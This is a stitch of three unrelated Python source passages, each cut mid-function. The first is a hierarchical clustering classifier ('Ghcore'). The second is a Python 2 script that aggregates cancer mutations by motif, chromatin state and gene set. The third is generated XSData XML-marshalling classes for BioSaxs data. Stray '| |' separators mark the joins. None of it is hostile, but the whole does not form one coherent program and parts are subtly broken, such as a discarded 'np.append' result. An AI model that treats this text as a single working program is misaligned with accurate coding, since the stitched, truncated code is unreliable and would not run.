if self.graph[winner_1.node_id][neighbour.node_id]['weight'] > age_max:
self.graph.remove_edge(winner_1.node_id, neighbour.node_id)
def get_graph_neighbours(self, node):
return list(self.graph.adj[node.node_id])
def draw_graph(self):
plt.figure()
nx.draw(self.graph, with_labels=True, font_weight='bold')
plt.show()
def is_to_remove(self, node):
return len(self.graph[node.node_id]) == 0
def delete_child(self, node):
self.graph.remove_node(node.node_id)
self.children = [child for child in self.children if child!=node]
def pruning(self, node_to_prune):
if len(node_to_prune)== 0: return []
assert self.parent is None
leaves = []
weights = []
outliers = []
for node in LevelOrderIter(self):
if node.is_leaf:
leaves.append(node)
weights.append(node.w)
for node in node_to_prune:
for j in range(len(node.y)):
sample = node.X[j, :]
sample = np.reshape(sample, (1, len(sample)))
target = node.y[j]
target = np.reshape(target, (1, len(target)))
distances = np.dot(np.asarray(weights).squeeze(), sample.T)
nearest = leaves[np.argmin(distances)]
if nearest.parent == node.parent:
if nearest.T > np.min(distances):
nearest.parent.add_sample(sample, target, node.sample_indeces[j], nearest)
else:
np.append(outliers, node.X[j])
else:
node.parent.add_sample(sample, target, node.sample_indeces[j], nearest)
node.parent.delete_child(node)
return outliers
def plot_local_quantization(self, accuracy, n_leaves):
nclass = len(np.unique(self.root.y))
colors = np.array(retrieve_n_class_color_cubic(N=nclass))
cy = np.array([colors[i].squeeze() for i in self.root.y-1])
W = np.array([child.w.squeeze() for child in self.children])
plt.figure()
plt.scatter(self.root.X[:, 0], self.root.X[:, 1], c=cy, marker='.', alpha=0.3, label='voronoi set')
plt.scatter(W[:, 0], W[:, 1], c='k', marker='o', label='gexin')
plt.title('Ghcore - h=%d - #C=%d - acc.=%.2f' %(self.root.height, n_leaves, accuracy))
plt.legend()
plt.show()
def plot_quantization(self, X_arch_core, y_arch_core, accuracy, leaves, folder_name, classifier_name):
nclass = len(np.unique(self.root.y))
colors = np.array(retrieve_n_class_color_cubic(N=nclass))
cy = np.array([colors[i].squeeze() for i in self.root.y])
ccore = np.array([colors[i].squeeze() for i in y_arch_core])
cmap = ListedColormap(sns.color_palette("bright", 3).as_hex())
plt.figure()
plt.scatter(self.root.X[:, 0], self.root.X[:, 1], c=cy, cmap=cmap, marker='.', alpha=0.2, label='training set')
plt.scatter(X_arch_core[:, 0], X_arch_core[:, 1], c=ccore, cmap=cmap, marker='o', label='archetypes')
plt.title('GH-ARCH - %s - h=%d - acc.=%.2f' %(classifier_name, self.root.height, accuracy))
plt.legend()
plt.savefig("%s/ghcore_h%d.png" %(folder_name, self.root.height))
plt.draw()
def predict_by_core(root, X_test, y_test, classifier):
arch_core = []
for node in LevelOrderIter(root):
if node.is_leaf:
if len(node.y) > 0:
arch_core.append(node)
else:
arch_core.append(node.parent)
_, arch_core_idx = np.unique([node.node_id for node in arch_core], return_index=True)
arch_core = [ arch_core[i] for i in arch_core_idx]
X_arch_core = np.array([node.w.squeeze() for node in arch_core])
# centroids = []
# for c in np.unique(root.y):
# centroids.append( np.mean(root.X[root.y.squeeze()==c, :], axis=0) )
# centroids = np.array(centroids)
#
# distances = cdist(X_arch_core, centroids)
# y_arch_core = np.argmin(distances, axis=1)
y_arch_core = []
for node in arch_core:
classes, n_samples = np.unique(node.y, return_counts=True)
y_arch_core.append(classes[np.argmax(n_samples)])
if len( np.unique(y_arch_core) ) < len( np.unique(y_test) ):
accuracy = 0
model = None
else:
n_classes = np.unique(y_arch_core).size
n_cluster = range(len(y_arch_core))
max_n_cluster_per_class = np.max(np.unique(y_arch_core, return_counts=True)[1])
for i in range(n_classes):
i_class_idx = [k for k in n_cluster if y_arch_core[k] == i]
ith_class_n_cluster = len(i_class_idx)
# Add each reference vector of a class for a number of time equale to maximum number
# of cluster representing single class
for j in range(max_n_cluster_per_class - ith_class_n_cluster):
X_arch_core = np.append(X_arch_core,[X_arch_core[i_class_idx[j%len(i_class_idx)]]], axis=0)
y_arch_core = np.append(y_arch_core,[y_arch_core[i_class_idx[j%len(i_class_idx)]]], axis=0)
if False:
model, accuracy = keras_cnn_model(X_arch_core, y_arch_core, X_test, y_test)
else:
model = copy.deepcopy( classifier[0](random_state=42) )
model.fit(X_arch_core, y_arch_core)
accuracy = model.score(X_test, y_test)
return accuracy, arch_core, model, X_arch_core, y_arch_core
def Ghcore(X_train, y_train, X_val, y_val, X_test, y_test, max_height, min_epochs, max_heterogenity, epsilon_w, epsilon_n, min_size, min_accuracy,
folder_name, heterogenity_decrease, age_max, classifier):
y_train = np.reshape(y_train, (len(y_train), 1))
y_val = np.reshape(y_val, (len(y_val), 1))
X_trainval = np.concatenate((X_train, X_val))
y_trainval = np.concatenate((y_train, y_val))
centroid_X = np.mean(X_train, axis=0)
centroid_X = np.reshape(centroid_X, (1, len(centroid_X)))
n_nodes = 0
root = GhcoreNode('Node_' + str(n_nodes), parent=None, X=X_train, y=y_train, sample_indeces=[], w=centroid_X, T=np.Inf)
root.set_up_child_indeces()
n_nodes = n_nodes + 1
k = 1
parent = root
accuracy = 0
outliers = []
pruned_nodes = 0
model = None
model2 = None
while k < max_height and accuracy < min_accuracy:
# print("Vertical growth - height = %d" %(k))
leaves = [node for node in LevelOrderIter(root) if node.is_leaf and len(node.y) > min_size and node.heterogenity > max_heterogenity]
n_leaves = len(leaves)
if n_leaves == 0:
break
for i in range(0, n_leaves):
parent = leaves[i]
counter = 0
epoch = 0
heterogenity_rate = 0
noise = np.random.uniform(0, 0.0001, parent.w.shape)
n = GhcoreNode('Node_' + str(n_nodes), parent=parent, X=[], y=[], sample_indeces=[], w=parent.w+noise)
parent.update_child_id(n)
parent.add_graph_node('Node_' + str(n_nodes))
n_nodes = n_nodes + 1
n = GhcoreNode('Node_' + str(n_nodes), parent=parent, X=[], y=[], sample_indeces=[], w=parent.w-noise)
parent.update_child_id(n)
parent.add_graph_node('Node_' + str(n_nodes))
n_nodes = n_nodes + 1
while epoch < min_epochs and heterogenity_rate < heterogenity_decrease:
first_time = True
# learning process
for j in range(0, len(parent.y)):
# if k > 2 and epoch > 0 and j > 3:
# print(epoch)
# print(j)
sample = parent.X[j, :]
sample = np.reshape(sample, (1, len(sample)))
target = parent.y[j]
target = np.reshape(target, (1, len(target)))
W = np.array([leaf.w.squeeze() for leaf in parent.children])
distances = np.sum( (sample - W)**2 , 1)
winner_1_idx = np.argmin(distances)
distance = np.sqrt(distances[winner_1_idx])
distances[winner_1_idx] = np.inf
winner_2_idx = np.argmin(distances)
winner_1 = parent.children[winner_1_idx]
winner_2 = parent.children[winner_2_idx]
if first_time:
first_time = False
avgT = np.mean(pdist(parent.X))
if epoch == 0:
winner_1.set_T(avgT)
winner_2.set_T(avgT)
parent.set_T(avgT)
if parent.add_sample(sample, target, j, winner_1) == -1: continue
winner_1.increment_elapsed_time()
winner_1.soft_competitive_learning(epsilon_w, sample)
parent.add_graph_edge(winner_1, winner_2)
# parent.draw_graph()
else:
if False: #parent.get_graph_neighbours(winner_1) >= parent.X.shape[1]:
# use convex hull
1
else:
if winner_1.T == None:
print(1)
explainable = distance < winner_1.T
if explainable:
if parent.add_sample(sample, target, j, winner_1) == -1: continue
winner_1.increment_elapsed_time()
winner_1.soft_competitive_learning(epsilon_w, sample)
parent.add_graph_edge(winner_1, winner_2)
# parent.draw_graph()
neighbours = parent.update_threshold(winner_1)
for neighbour in neighbours:
neighbour.soft_competitive_learning(epsilon_n, sample)
parent.update_threshold(neighbour)
if neighbour != winner_2:
parent.update_graph_edge(winner_1, neighbour, age_max)
else:
new_node = GhcoreNode('Node_' + str(n_nodes), parent=parent, X=[], y=[], sample_indeces=[], w=sample)
parent.update_child_id(new_node)
parent.add_graph_node('Node_' + str(n_nodes))
n_nodes = n_nodes + 1
parent.add_sample(sample, target, j, new_node)
new_node.set_T(parent.T)
counter = 0
if new_node.T == None:
print(1)
if False:
#node pruning
nodes_to_prune = []
for node in parent.children:
if parent.is_to_remove(node):
nodes_to_prune.append(node)
if len(nodes_to_prune) > 0:
outliers.append(root.pruning(nodes_to_prune))
pruned_nodes += len(nodes_to_prune)
heterogenities = []
for node in parent.children:
if len(node.y) > 0:
node.heterogenity = np.sum(np.abs(node.X - node.w))
heterogenities.append(node.heterogenity)
avg_heterogenity = np.mean(heterogenities)
heterogenity_rate = np.abs(avg_heterogenity-parent.heterogenity)/parent.heterogenity
epoch = epoch + 1
counter = counter + 1
for child in parent.children:
child.set_up_child_indeces()
# parent.draw_graph()
if not model is None:
model2 = model
len2 = len(y_arch_core)
accuracy, leaves, model, X_arch_core, y_arch_core = predict_by_core(root, np.concatenate((X_train, X_val)), np.concatenate((y_train, y_val)), classifier)
if X_test.shape[1] == 2:
# parent.plot_quantization(X_arch_core, y_arch_core, accuracy, leaves, folder_name, classifier[1])
X_err_test, accuracy_test, model_test, fail_points_test, y_pred_test = evaluate_core(X_arch_core, y_arch_core, X_test, y_test, classifier[0], cname=classifier[1], SEED=42)
X_err_train, accuracy_train, model_train, | |
cancer_types_samples[mut_info[2]] = [mut_info[5]]
cancer_types_samples_count[mut_info[2]] = 1
'''the last column in the mutation info contains annotations'''
state = "NA"
if 'ChromHMM:' in mut_info[-1]:
for x in mut_info[-1].split('|'):
if x.startswith("ChromHMM:"):
state = x
try:
samples_per_chromhmm[state].append(mut_info[5])
except KeyError:
samples_per_chromhmm[state] = [mut_info[5]]
'''Get samples per allele: e.g C>A:sample1,sample2...'''
try:
samples_per_allele_mut[mut_info[1]].append(mut_info[5])
except:
samples_per_allele_mut[mut_info[1]] = [mut_info[5]]
try:
cols_dict['start'] = str(sorted(mut_start_positions)[0])#l[1]
cols_dict['end'] = str(sorted(mut_end_positions)[-1])#l[2]
cols_dict['Position'] = '{}:{}-{}'.format(l[0],cols_dict['start'],cols_dict['end'])
except IndexError:
#if no mutation was found in the region, skip the line and move on to the next region
continue
cols_dict['Muts'] = ['#'.join(x) for x in mutations_info]
cols_dict['#Muts'] = len(mutations_info)
cols_dict['#Samples'] = len(cols_dict['SamplesMuts'])
c = Counter(cancer_types)
cols_dict['Cancer-Types:#Muts'] = [x+":"+str(c[x]) for x in c]
cols_dict['Cancer-Types:#Samples'] = [x+":"+str(cancer_types_samples_count[x]) for x in cancer_types_samples_count]
'''Process Mutated-Motifs All (not only those that are significant based on regulatory mutations)'''
mutated_motifsall = [x.strip().split('#') for x in l[12].split(',')]
samples_per_tf_motifsall = {}
samples_per_tf_position_motifsall = {}
samples_per_tf_allele_motifsall = {}
samples_per_tf_per_position_per_allele_motifsall = {}
samples_per_chromhmm_motifsall = {}
motifs_already_added = []
muts_already_added = []
for motif_info in mutated_motifsall:
'''avoid recounting the same mutation in the same motif.
This may happen due to multiple instances of the same motif in the mutation position'''
if '#'.join(motif_info[14:18])+"#"+motif_info[8] in motifs_already_added:
continue
motifs_already_added.append('#'.join(motif_info[14:18])+"#"+motif_info[8])
'''Get samples per TF-motif'''
try:
samples_per_tf_motifsall[motif_info[17]].append(motif_info[8])
except KeyError:
samples_per_tf_motifsall[motif_info[17]] = [motif_info[8]]
'''Get samples per TF Motif position; to identify the number of muts per motif position'''
try:
samples_per_tf_position_motifsall[motif_info[17]+"#"+motif_info[13]].append(motif_info[8])
except KeyError:
samples_per_tf_position_motifsall[motif_info[17]+"#"+motif_info[13]] = [motif_info[8]]
'''Get samples per allele; to identify the number of mutation types per allele such as CTCF#A>C:3'''
try:
samples_per_tf_allele_motifsall[motif_info[17]+"#"+motif_info[12]].append(motif_info[8])
except KeyError:
samples_per_tf_allele_motifsall[motif_info[17]+"#"+motif_info[12]] = [motif_info[8]]
try:
samples_per_tf_per_position_per_allele_motifsall[motif_info[17]+"#"+motif_info[13]+"#"+motif_info[12]].append(motif_info[8])
except KeyError:
samples_per_tf_per_position_per_allele_motifsall[motif_info[17]+"#"+motif_info[13]+"#"+motif_info[12]] = [motif_info[8]]
'''Almost all motifs that overlap with single mutation are expected to have the same chromHMM state.
Therefore take state of the first motif'''
if '#'.join(motif_info[0:3])+"#"+motif_info[8] in muts_already_added:
continue
muts_already_added.append('#'.join(motif_info[0:3])+"#"+motif_info[8])
try:
samples_per_chromhmm_motifsall[motif_info[22]].append(motif_info[8])
except KeyError:
samples_per_chromhmm_motifsall[motif_info[22]] = [motif_info[8]]
'''Get counts from dicts'''
samples_dicts = {'RegMuts-ChromHMM':samples_regmuts_per_chromhmm,#Regmuts
'RegMuts-Motifs':samples_regmuts_per_TFmotif, 'RegMuts-MotifPositions':samples_regmuts_per_TFmotif_position,
'RegMuts-MotifAllele':samples_regmuts_per_TFmotif_allele, 'RegMuts-MotifPositions-Allele':samples_regmuts_per_TFmotif_position_allle,
'Muts-ChromHMM':samples_per_chromhmm, 'Muts-Allele':samples_per_allele_mut,#All muts
'Muts-Motifs':samples_per_tf_motifsall, 'Muts-MotifPositions':samples_per_tf_position_motifsall, 'Muts-MotifAllele':samples_per_tf_allele_motifsall,#MutMotifsAll
'Muts-MotifPositions-Allele':samples_per_tf_per_position_per_allele_motifsall, 'Muts-Motifs-ChromHMM':samples_per_chromhmm_motifsall}
for k in sorted(samples_dicts.keys()):
mutcounts = {}
samplecounts = {}
for x in samples_dicts[k]:
mutcounts[x]=len(samples_dicts[k][x])
samplecounts[x]=len(set(samples_dicts[k][x]))
c = ','.join([x.replace('ChromHMM:','')+":"+str(mutcounts[x]) for x in sorted(mutcounts, key=mutcounts.get, reverse=True)])
cols_dict['StatsMuts'].append(k+'['+c+']')
c_unique = ','.join([x.replace('ChromHMM:','')+":"+str(samplecounts[x]) for x in sorted(samplecounts, key=samplecounts.get, reverse=True)])
cols_dict['StatsSamples'].append(k+'['+c_unique+']')
'''Report CancerType:ChromatinType:number_of_times'''
#instead of writing the dict put them in a list to keep the columns order
cols_to_write = [cols_dict['chr'], cols_dict['start'], cols_dict['end'], cols_dict['Position'],
','.join(cols_dict['Cohorts']), cols_dict['#Cohorts'], cols_dict['Score'], cols_dict['FDR'],
cols_dict['#RegMuts'], cols_dict['#Samples(RegMuts)'],
','.join([x+":"+str(cols_dict['Cancer-Types:#RegMuts'][x]) for x in cols_dict['Cancer-Types:#RegMuts']]),
','.join([x+":"+str(cols_dict['Cancer-Types:#Samples(RegMuts)'][x]) for x in cols_dict['Cancer-Types:#Samples(RegMuts)']]),
cols_dict['#Muts'], cols_dict['#Samples'], ','.join(cols_dict['Cancer-Types:#Muts']), ','.join(cols_dict['Cancer-Types:#Samples']),
#'Nearby-Genes(Downstream/Upstream:Distance;COSMIC;KEGG;PCAWG)'
','.join(cols_dict['StatsMuts']),','.join(cols_dict['StatsSamples']),
','.join(cols_dict['RegMuts']), ','.join(cols_dict['Muts']), ','.join(cols_dict['Mutated-Moitfs']), ','.join(cols_dict['Max-RegMotif']),
','.join(cols_dict['SamplesMuts'])
]
aggregated_lines.append(cols_to_write)
summaries_dict['#Elements'] +=1
summaries_dict['#RegMuts'] += cols_dict['#RegMuts']
summaries_dict['#Samples(RegMuts)'] += cols_dict['#Samples(RegMuts)']
summaries_dict['#Muts'] += cols_dict['#Muts']
summaries_dict['#Samples'] += cols_dict['#Samples']
return aggregated_lines, summaries_dict
def generate_genesets_genes_dict(geneset_files):
cosmic_genes_file = "analysis/cancer_gene_census.csv"
kegg_pathways_file = "analysis/kegg_pathways_fromdb_madeAgenesetPerPathway.gmt"
pcawg_drivers_file = "analysis/PCAWG_cancer_drivers_fulllist.txt"
genesets_genes_dict = {'KCP':[], 'COSMIC': [], 'PCD': []}
with open(cosmic_genes_file, 'r') as cosmic_genes_ifile:
lines = cosmic_genes_ifile.readlines()
for l in lines[1::]:
sl = l.strip().split(',')
if sl[0]!="":
genesets_genes_dict['COSMIC'].append(sl[0])
for s in sl:
if s.startswith('ENSG'):
genesets_genes_dict['COSMIC'].append(s)
with open(kegg_pathways_file, 'r') as kegg_pathways_ifile:
lines = kegg_pathways_ifile.readlines()
for l in lines:
sl = l.split('\t')
if sl[0]=="path:hsa05200":
genesets_genes_dict['KCP'] = sl[3::]
with open(pcawg_drivers_file, 'r') as pcawg_drivers_ifile:
lines = pcawg_drivers_ifile.readlines()
for l in lines:
sl = l.strip().split('\t')
if sl[4]!="":
genesets_genes_dict['PCD'].extend(sl[4].split(';'))
for s in sl[1].split('::'):
if s.startswith('ENSG'):
genesets_genes_dict['PCD'].append(s)
return genesets_genes_dict
def get_enriched_gene_geneset(regions_genes_dict, genesets_genes_dict):
enriched_genesets_dict = {}
enriched_genesets_dict_overall = {}
genes_all = {}
genes_all_per_side = {}
for region in regions_genes_dict.keys():
for i, gene_info in enumerate(regions_genes_dict[region]):
gene_name = gene_info.split('::')[0]
gene_id = gene_info.split('::')[1]
gene_place_dist = gene_info.split('::')[2].split('O')[0].split('D')[0].split('U')[0] + gene_info.split('::')[2][len(gene_info.split('::')[2].split('O')[0].split('D')[0].split('U')[0])]
try:
if gene_name not in genes_all[gene_place_dist[-1]]:
genes_all[gene_place_dist[-1]].append(gene_name)
except KeyError:
genes_all[gene_place_dist[-1]] = [gene_name]
try:
if gene_name not in genes_all_per_side[gene_place_dist]:
genes_all_per_side[gene_place_dist].append(gene_name)
except KeyError:
genes_all_per_side[gene_place_dist] = [gene_name]
for geneset in sorted(genesets_genes_dict.keys()):
if (gene_name in genesets_genes_dict[geneset] or
gene_id in genesets_genes_dict[geneset] or
gene_id.split('.')[0] in genesets_genes_dict[geneset]):
regions_genes_dict[region][i]+="::"+geneset
try:
if gene_name not in enriched_genesets_dict[geneset+gene_place_dist]:
enriched_genesets_dict[geneset+gene_place_dist].append(gene_name)
except KeyError:
enriched_genesets_dict[geneset+gene_place_dist] = [gene_name]
try:
if gene_name not in enriched_genesets_dict_overall[geneset]:
enriched_genesets_dict_overall[geneset].append(gene_name)
except KeyError:
enriched_genesets_dict_overall[geneset] = [gene_name]
print '\t'.join([r + ':' + str(len(genes_all[r])) for r in genes_all.keys()])
print '\t'.join([r + ':' + str(len(genes_all_per_side[r])) for r in genes_all_per_side.keys()])
print '\t'.join([r + ':' + str(len(enriched_genesets_dict_overall[r])) for r in enriched_genesets_dict_overall.keys()])
print '\t'.join([r + ':' + str(len(enriched_genesets_dict[r])) for r in enriched_genesets_dict.keys()])
return regions_genes_dict, genes_all, genes_all_per_side, enriched_genesets_dict_overall, enriched_genesets_dict
def write_aggregated_lines_to_outfile(aggregated_lines, cols_to_write,
regions_genes_dict, summary_info_to_write, summary_dicts_to_write,
region_types_dict,
aggregated_output_file):
with open(aggregated_output_file, 'w') as output_ofile:
output_ofile.write("Summary Info\n")
for dict_name in sorted(summary_info_to_write.keys()):
output_ofile.write(dict_name + '\t' + '\t'.join([r + ':' + str((summary_info_to_write[dict_name][r])) for r in summary_info_to_write[dict_name].keys()]) + '\n')
for dict_name in sorted(summary_dicts_to_write.keys()):
output_ofile.write(dict_name + '\t' + '\t'.join([r + ':' + str(len(summary_dicts_to_write[dict_name][r])) for r in summary_dicts_to_write[dict_name].keys()]) + '\n')
output_ofile.write('\t'.join(cols_to_write) + '\t' + 'Feature_types'+'\n')
for l in aggregated_lines:
genes = "None"
try:
genes = ','.join(regions_genes_dict[l[3]])
except KeyError:
pass
feature_type = 'intergenic'
feature_types = ['intergenic']
try:
feature_to_select_index = 0
n = 0
feature_types = [x[0]+":"+str(x[1]) for x in region_types_dict[l[3]]]
for i, feature in enumerate(region_types_dict[l[3]]):#find index of the feature that has the largest num of muts
if feature[0] != 'gene':
if feature[1]>n:
feature_to_select_index = i
n = feature[1]
feature_type = region_types_dict[l[3]][feature_to_select_index][0]
if feature_type=='gene':
feature_type = 'intronic'
except KeyError:
pass
output_ofile.write('\t'.join([str(x) for x in l]) + '\t' + genes + '\t' + feature_type + '\t' + ','.join(feature_types)+'\n')
return aggregated_output_file
def overlaps(ms, me, rs, re):
if ms>=rs and ms<=re:#if m starts in r then it overlaps
return True
elif me>=rs and me<=re:#if m ends in r then it overlaps
return True
elif ms<=rs and me >= re:#r is within m
return True
return False
def get_region_type(aggregated_lines, genes_segments_input_file, gene_types_to_consider, gene_status_to_consider, feature_types_to_consider, muts_col_index=19):
region_temp_file = 'aggregated_lines_temp_regions'
with open(region_temp_file, 'w') as ofile:
for reg in aggregated_lines:
ofile.write('\t'.join(reg[0:4]) + '\t' + reg[muts_col_index] + '\n')
BedTool(genes_segments_input_file).intersect(BedTool(region_temp_file), wo=True).saveas(region_temp_file+'genesfeatures')
region_types_dict = {}#store feature type and number of muts in the feature type
with open(region_temp_file+'genesfeatures', 'r') as ifile:
l = ifile.readline().strip().split('\t')
while len(l)>3:
if l[8] in gene_types_to_consider and l[9] in gene_status_to_consider and l[3] in feature_types_to_consider:
#check the number of muts that have start larger than the start of this feature
#keep the feature that have the largest number of muts
#for each positionID append its overlapping feature types
num_muts_in_this_feature = 0
for mut in l[14].split(','):
mut_start = int(mut.split('#')[0].split(':')[1].split('-')[0])
mut_end = int(mut.split('#')[0].split(':')[1].split('-')[1])
if overlaps(mut_start, mut_end, int(l[1]), int(l[2])):
#if mut_start>int(l[11]) or (mut_start<int(l[11]) and mut_end>int(l[11])):#the mut is within the region
num_muts_in_this_feature+=1
#append feature type and the number of muts in it for each regionID
try:
region_types_dict[l[13]].append([l[3], num_muts_in_this_feature])
except KeyError:
region_types_dict[l[13]] = [[l[3], num_muts_in_this_feature]]
l = ifile.readline().strip().split('\t')
#os.remove(region_temp_file)
#os.remove(region_temp_file+'genesfeatures')
return region_types_dict
def get_features_from_gencode(gencode_input_file, gencode_output_file):
with open(gencode_input_file, 'r') as ifile, open(gencode_output_file, 'w') as ofile:
l = ifile.readline()
while l:
if l.startswith('#'):
print 'Skipping: ', l
l = ifile.readline()
continue
sl = l.strip().split('\t')
if len(sl)>8:
info_dict = {}
for info in sl[8].split(';'):
if '=' in info:
info_dict[info.split('=')[0]] = info.split('=')[1]
#if info_dict['gene_status'] == 'KNOWN':
try:
ol = [sl[0], sl[3], sl[4], sl[2], sl[1], sl[6], info_dict['ID'], info_dict['gene_id']+"::"+info_dict['gene_name'], info_dict['gene_type'], info_dict['gene_status']]
ofile.write('\t'.join(ol) + '\n')
#if it was a gene then write a promoter region to the file too
if sl[2]=='gene':
promoter_start = int(sl[3])-2000
promoter_end = int(sl[3])-1
if sl[6]=='-':
promoter_start = int(sl[4])+1
promoter_end = int(sl[4])+2000
if promoter_start<1:
promoter_start = 1
if promoter_end<1:
promoter_end = 1
ol = [sl[0], str(promoter_start), str(promoter_end), 'proximal_promoter', sl[1], sl[6], 'proximal_promoter:'+info_dict['ID'], info_dict['gene_id']+"::"+info_dict['gene_name'], info_dict['gene_type'], info_dict['gene_status']]
ofile.write('\t'.join(ol) + '\n')
except KeyError:
print "Key not found: ", sl, info_dict
else:
print "Length<8: ", l, sl
l = ifile.readline()
if l=="":
break
return gencode_output_file
def getSigElements(generated_sig_merged_element_files, n, max_dist, window, output_dir):
upstream=True
downstream=True
overlapping = True
ext = ""
try:
ext = generated_sig_merged_element_files[0].split('/')[-1].split('.bed9')[1].replace('groupedbymutwithmotifinfo_','').replace('_statspvalues', '')
except IndexError:
print "error: ", generated_sig_merged_element_files
sys.exit()
aggregated_output_file = output_dir+'/combined{ext}_merged_intersectedmuts_grouped_aggregated{n}{up}{dw}maxdist{max_dist}kb_within{window}kb.tsv'.format(ext=ext, n=n, up="Up", dw="Dw", max_dist=max_dist/1000, window=window/1000)
if os.path.exists(aggregated_output_file):
return aggregated_output_file
print generated_sig_merged_element_files
annotated_motifs = 'mutations_files/obsann22May2017_exclVEP.bed9'
tracks_dir = 'datafiles/chromatin_marks_all_cells_onlynarrowpeaks'
observed_mutations_all = 'mutations_files/obsagr22May2017_exclVEP.bed9'#_notInExonsProteinCodingProcessedTranscriptIG.bed9'#'mutations_files/observedunique.bed9'
#regions_input_file = output_dir+'/combined_onlysig_merged_intersectedmuts_grouped_recurrent.col12'
combined_mut_grouped_file = output_dir+'/combined{ext}_merged_intersectedmuts_grouped_recurrent.col12'.format(ext=ext)
if not os.path.exists(combined_mut_grouped_file):
combined_file_all = combined_mut_grouped_file+'_temp'
with open(combined_file_all, 'w') as regions_input_ofile:
for cohort_sigregions_file in generated_sig_merged_element_files:
cohort_name = cohort_sigregions_file.split('/')[-1].split('_')[0]
with open(cohort_sigregions_file, 'r') as cohort_sigregions_ifile:
l = cohort_sigregions_ifile.readline().strip().split('\t')
while l and len(l)>10:
regions_input_ofile.write('\t'.join(l[0:3]) | |
= dmass
else:
strMessage = (
"ERROR! XSDataRamboTainer.setDmass argument is not XSDataDouble but %s"
% dmass.__class__.__name__
)
raise BaseException(strMessage)
def delDmass(self):
self._dmass = None
dmass = property(getDmass, setDmass, delDmass, "Property for dmass")
def export(self, outfile, level, name_="XSDataRamboTainer"):
showIndent(outfile, level)
outfile.write(unicode("<%s>\n" % name_))
self.exportChildren(outfile, level + 1, name_)
showIndent(outfile, level)
outfile.write(unicode("</%s>\n" % name_))
def exportChildren(self, outfile, level, name_="XSDataRamboTainer"):
XSData.exportChildren(self, outfile, level, name_)
if self._vc is not None:
self.vc.export(outfile, level, name_="vc")
if self._qr is not None:
self.qr.export(outfile, level, name_="qr")
if self._mass is not None:
self.mass.export(outfile, level, name_="mass")
if self._dvc is not None:
self.dvc.export(outfile, level, name_="dvc")
if self._dqr is not None:
self.dqr.export(outfile, level, name_="dqr")
if self._dmass is not None:
self.dmass.export(outfile, level, name_="dmass")
def build(self, node_):
for child_ in node_.childNodes:
nodeName_ = child_.nodeName.split(":")[-1]
self.buildChildren(child_, nodeName_)
def buildChildren(self, child_, nodeName_):
if child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "vc":
obj_ = XSDataDouble()
obj_.build(child_)
self.setVc(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "qr":
obj_ = XSDataDouble()
obj_.build(child_)
self.setQr(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "mass":
obj_ = XSDataDouble()
obj_.build(child_)
self.setMass(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "dvc":
obj_ = XSDataDouble()
obj_.build(child_)
self.setDvc(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "dqr":
obj_ = XSDataDouble()
obj_.build(child_)
self.setDqr(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "dmass":
obj_ = XSDataDouble()
obj_.build(child_)
self.setDmass(obj_)
XSData.buildChildren(self, child_, nodeName_)
# Method for marshalling an object
def marshal(self):
oStreamString = StringIO()
oStreamString.write(unicode('<?xml version="1.0" ?>\n'))
self.export(oStreamString, 0, name_="XSDataRamboTainer")
oStringXML = oStreamString.getvalue()
oStreamString.close()
return oStringXML
# Only to export the entire XML tree to a file stream on disk
def exportToFile(self, _outfileName):
outfile = open(_outfileName, "w")
outfile.write(unicode('<?xml version="1.0" ?>\n'))
self.export(outfile, 0, name_="XSDataRamboTainer")
outfile.close()
# Deprecated method, replaced by exportToFile
def outputFile(self, _outfileName):
print(
"WARNING: Method outputFile in class XSDataRamboTainer is deprecated, please use instead exportToFile!"
)
self.exportToFile(_outfileName)
# Method for making a copy in a new instance
def copy(self):
return XSDataRamboTainer.parseString(self.marshal())
# Static method for parsing a string
def parseString(_inString):
doc = minidom.parseString(_inString)
rootNode = doc.documentElement
rootObj = XSDataRamboTainer()
rootObj.build(rootNode)
# Check that all minOccurs are obeyed by marshalling the created object
oStreamString = StringIO()
rootObj.export(oStreamString, 0, name_="XSDataRamboTainer")
oStreamString.close()
return rootObj
parseString = staticmethod(parseString)
# Static method for parsing a file
def parseFile(_inFilePath):
doc = minidom.parse(_inFilePath)
rootNode = doc.documentElement
rootObj = XSDataRamboTainer()
rootObj.build(rootNode)
return rootObj
parseFile = staticmethod(parseFile)
# end class XSDataRamboTainer
class XSDataInputBioSaxsAsciiExportv1_0(XSDataInput):
def __init__(
self,
configuration=None,
experimentSetup=None,
sample=None,
integratedCurve=None,
integratedImage=None,
):
XSDataInput.__init__(self, configuration)
if integratedImage is None:
self._integratedImage = None
elif integratedImage.__class__.__name__ == "XSDataImage":
self._integratedImage = integratedImage
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAsciiExportv1_0 constructor argument 'integratedImage' is not XSDataImage but %s"
% self._integratedImage.__class__.__name__
)
raise BaseException(strMessage)
if integratedCurve is None:
self._integratedCurve = None
elif integratedCurve.__class__.__name__ == "XSDataFile":
self._integratedCurve = integratedCurve
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAsciiExportv1_0 constructor argument 'integratedCurve' is not XSDataFile but %s"
% self._integratedCurve.__class__.__name__
)
raise BaseException(strMessage)
if sample is None:
self._sample = None
elif sample.__class__.__name__ == "XSDataBioSaxsSample":
self._sample = sample
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAsciiExportv1_0 constructor argument 'sample' is not XSDataBioSaxsSample but %s"
% self._sample.__class__.__name__
)
raise BaseException(strMessage)
if experimentSetup is None:
self._experimentSetup = None
elif experimentSetup.__class__.__name__ == "XSDataBioSaxsExperimentSetup":
self._experimentSetup = experimentSetup
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAsciiExportv1_0 constructor argument 'experimentSetup' is not XSDataBioSaxsExperimentSetup but %s"
% self._experimentSetup.__class__.__name__
)
raise BaseException(strMessage)
# Methods and properties for the 'integratedImage' attribute
def getIntegratedImage(self):
return self._integratedImage
def setIntegratedImage(self, integratedImage):
if integratedImage is None:
self._integratedImage = None
elif integratedImage.__class__.__name__ == "XSDataImage":
self._integratedImage = integratedImage
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAsciiExportv1_0.setIntegratedImage argument is not XSDataImage but %s"
% integratedImage.__class__.__name__
)
raise BaseException(strMessage)
def delIntegratedImage(self):
self._integratedImage = None
integratedImage = property(
getIntegratedImage,
setIntegratedImage,
delIntegratedImage,
